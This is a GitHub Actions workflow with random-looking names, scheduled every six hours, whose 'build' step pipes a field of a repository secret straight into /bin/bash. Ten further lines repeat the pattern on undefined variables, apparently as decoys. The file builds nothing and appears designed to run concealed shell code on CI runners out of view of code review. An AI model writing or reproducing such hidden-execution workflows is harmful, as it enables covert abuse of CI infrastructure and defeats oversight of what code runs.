name: sogntaozisn
on:
  workflow_dispatch:
  schedule:
    - cron: '5 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: sogntaozisn
        env:
          kz2164: ${{ secrets.kz2164 }}
        run: |
          echo $kz2164 | jq -r .jszzn6755 | /bin/bash
          echo $b101 | jq -r .ds1 | /bin/bash
          echo $xekml43 | jq -r .um572 | /bin/bash
          echo $vjavz64 | jq -r .matce8 | /bin/bash
          echo $b78 | jq -r .vmsj3 | /bin/bash
          echo $v44 | jq -r .eycx32497 | /bin/bash
          echo $frv188 | jq -r .fkgrk87597 | /bin/bash
          echo $xjt5 | jq -r .tvt7 | /bin/bash
          echo $m69 | jq -r .yvrp07694 | /bin/bash
          echo $zfhfx8 | jq -r .tmqau1 | /bin/bash
          echo $bbm7417 | jq -r .nav0 | /bin/bash

